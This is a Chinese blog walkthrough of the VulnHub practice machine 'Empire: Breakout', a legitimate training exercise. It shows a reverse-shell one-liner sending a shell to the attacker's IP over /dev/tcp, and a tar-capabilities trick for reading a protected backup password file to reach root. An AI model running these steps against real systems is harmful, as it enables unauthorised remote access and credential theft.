Empire: Breakout靶场攻破

已于 2024-12-25 12:58:47 修改
阅读量478 收藏
点赞数 11
分类专栏: 打遍vulnhub靶场 文章标签: 安全
于 2024-12-25 12:58:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2402_83946446/article/details/144699832
版权

前言

攻击机:192.168.56.111

靶机:192.168.56.114

ambd 文件共享和打印服务

一、信息收集

 发现在页面源码中有brainfuck编码,解码结果为.2uqPEfj3D<P'a-3可能为一个密码

上文发现ambd 服务使用enum4linux -a -o 192.168.56.114 枚举smb服务

获取账号和密码登录后台

发现两个用户nobody和cyber

 在 https://192.168.56.114:20000登录cyber和.2uqPEfj3D<P'a-3登陆成功

发现终端功能尝试反弹shell

二、反弹shell成功

sh -i >& /dev/tcp/192.168.56.111/5555 0>&1

nc -lvnp 5555

尝试常见的提权方式内核,suid,sudo都失败了,内核有漏洞但无gcc命令,尝试另一种方法敏感文件泄露

capabilities提权

发现tar命令,而且发现备份文件

/home/cyber/tar  

/var/backups/.old_pass.bak

tar提权

获取密码

/home/cyber/tar  -cvf pass.tar /var/backups/.old_pass.bak
tar -xvf pass.tar
cat  ./var/backups/.old_pass.bak

三、获取root权限

/bin/bash 获取bash环境,切换用户

获取flag

[Vulnhub]Empire: Breakout
qq_48749937的博客
03-04 4502
kali ip:192.168.56.105 靶机 ip:192.168.56.110 首先还是常规的扫描靶机开放端口情况 这个靶机跟平常只有ssh和http的靶机不同,没有ssh,猜测可能需要获取webshell 首先访问每一个http服务,80端口: 10000端口: 20000端口: 发现存在两个登录页面,但在审计80端口的首页源码时,发现一串密码,是ook加密: 拿到网站去解密,获得一串密码 成功获取密码,但是目前没有账号,想了好久找不到账号该这么找..
EMPIRE:BREAKOUT渗透测试
最新发布
weixin_69783474的博客
02-09 643
7、在刚才的解码中我们找到了一个密码,又在刚才找到了一个用户名,而10000和20000又都是登陆界面,所以我们可以尝试登录一下。80端口是一个apache页面,我们看一下有没有什么信息,发现并没有什么信息,可以再看一下网页的源代码。Cd 进去又说没有这样的文件,而tar本身有很多权限,所以说明可读有其他文件,通过其他文件可以看tar。可以知道它具有读取⽂件的⼀个功能。有一个这样的文件,发现没有可执行的权限,但是刚才的tar有可执行的权限。(其中的ip地址是kali的ip地址,6666是刚才设置的端口)
Empire: Breakout
Forever_Han13的博客
04-04 670
$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 16:54 CST Nmap scan report for 192.168.0.1 Host is up (0.00054s latency). MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies) Nmap scan report fo
【VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3925
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
靶机1 Empire:Breakout(帝国突围)
honest_gg的博客
09-09 1380
本靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权
Empire Breakout (vulnhub靶机之帝国系列靶机1)
m0_53193784的博客
08-13 444
vulnhub靶场报告,本次文章对vulnhub靶场的帝国系列第一台靶机进行渗透并输出渗透测试报告,后续作者会更新跟多的靶场给各位提供思路.希望可以帮到大家. 一起进步. fucking go
Game Theme: Grow Empire: Rome-crx插件
04-06
只有Grow Empire:Rome的最佳高清图像为您的标签背景。 游戏的高清图像在每个选项卡上的成长帝国! 您将获得:1:高清新标签页体验2:简单,清晰的视图! 没有无用的工具,图块或小部件!!! 3:没有烦人的弹出窗口...
vulnhub靶场EMPIRE:BREAKOUT
qq_58091216的博客
01-29 1157
在Linux中,能力是一种粒度更细的权限系统,用于授予进程执行特定操作的权限,而不是传统的用户和组权限模型。我们已经有了用户的密码,所以我们要着手寻找用户名了,由于靶机开放了smb服务,所以我们可以收集有关靶机smb的信息, 使用命令enum4linux可以收集大量的信息。用户和组枚举: Enum4linux 可以列出目标系统上的用户和组,包括一些敏感信息,如用户ID(UID)、组ID(GID)、用户描述等。10000端口和20000端口是不同的登录系统,一个是登录网站的,一个是登录用户的。
vulnhub-EMPIRE: BREAKOUT
qq_43006864的博客
05-01 879
Empire: Breakout ~ VulnHub 靶机:EMPIRE: BREAKOUT 攻击机: kali linux Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集 nmap 192.168.1.1/24 nmap -sS -sV -A -p- 192.168.1.107 访问一下80端口 在页面源码的最底部发...
靶机渗透练习42-Empire Breakout
hirak0的博客
04-19 2422
靶机描述 靶机地址:https://www.vulnhub.com/entry/empire-breakout,751/ Description Difficulty: Easy This box was created to be an Easy box, but it can be Medium if you get lost. For hints discord Server ( https://discord.gg/7asvAhCEhe ) 一、搭建靶机环境 攻击机Kali: IP地址:192
EMPIRE_BREAKOUT_ 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-09 779
初见BrainFxxk加密,反正名字很霸气
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
qq_51577576的博客
03-05 1640
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
Vulnhub项目:EMPIRE: BREAKOUT
Ays.Ie的博客
12-07 287
Vulnhub项目:EMPIRE: BREAKOUT
Vulnhub靶机——EMPIRE: BREAKOUT
流水不争先,争的是滔滔不绝
04-08 1090
Vulnhub靶机——EMPIRE: BREAKOUT,tar文件具有可执行权,并且具备跨目录读取任意文件的特殊权限,利用tar文件的打包压缩再解压,实现文件的权限绕过
靶机Empire:Breakout(帝国突围)
m0_67427205的博客
12-18 260
扫描同一网段的ip地址,因为靶机的ip地址我们不知道本靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权使用 enum4linux 枚举信息Brainfuck解密webadmin 后台反弹 shell 提权提权微信搜索公众号关注“东南网络安全
Vulnhub靶机:empire breakout
qq_48904485的博客
01-08 1021
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:empirebreakout(10.0.2.11)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
vulnhub:Empire: Breakout
Ra1n3的博客
11-29 2807
vulnhub打靶记录
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能。在这个靶场中,你可以接触到加密方式和解密过程,对于第一次接触这种加密方式的人来说,可以使用在线站点来进行解密操作,提高对该加密方式的理解和熟悉度。 EMPIRE: BREAKOUT靶场是一个适合初学者的简单难度的靶场,对于计算机学习者来说,初期的学习往往是最迷茫和难以坚持的,但通过不断的学习和实践,经验和能力会得到提高。这个靶场可以帮助你探索和学习网络安全方面的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.youkuaiyun.com/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值